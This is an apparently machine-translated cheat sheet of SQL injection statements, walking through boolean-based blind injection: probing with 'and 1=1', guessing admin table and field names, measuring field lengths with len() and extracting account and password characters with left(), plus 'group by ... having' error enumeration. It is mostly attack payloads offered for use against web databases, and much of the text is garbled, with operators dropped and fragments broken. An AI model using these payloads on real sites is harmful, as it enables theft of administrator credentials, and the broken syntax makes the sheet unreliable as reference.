常用注入语句（国外英文资料）.doc

常用注入语句（国外英文资料） Common injection statement Determine if there is an injection point ; And 1 = 1 and 1 = 2 The name of the table in general is admin adminuser user pass password. And 0 (*) from *) And 0 (*) from admin) - determine if there is an admin table Guess the number of accounts if you encounter 0 return correct page 1 ; The return error page indicates that the number of accounts is one And (select count (*) from admin) And (select count (*) from admin) Guess the name of the field name in len () parenthesis plus the field name we thought of. And 1 = (select count (*) from admin where len (*), And 1 = (select count (*) from admin where len (user field name name) 0) And 1 = (select count (*) from admin where len (password field name password) 0) Guess the length of the various fields. The length of the solution is to change the 0 to the correct page And 1 = (select count (*) from admin where len (*) And 1 = (select count (*) from admin where len (name) 6) error And 1 = (select count (*) from admin where len (name) 5) the correct length is 6 And 1 = (select count (*) from admin where len (name) = 6) is correct And 1 = (select count (*) from admin where len (password) 11) is correct And 1 = (select count (*) from admin where len (password) 3) the error length is 12 And 1 = (select count (*) from admin where len (password) = 12) is correct Guess the characters And 1 = (select count (*) from admin where left (name, 1) = a) - - guess the number one user account Select count (*) from admin where left (name, 2) = ab) - the second user account number Just add a character this time and guess how many bits youve just guessed are correct, and the account is out And 1 is equal to select top 1, which is equal to 1. This query can be used to guess the Chinese user and password. Just change the Numbers in the back to the Chinese version of the code and then convert the result to a character. Group by users. Id having 1 = 1 The group by users. Id, user.password, user.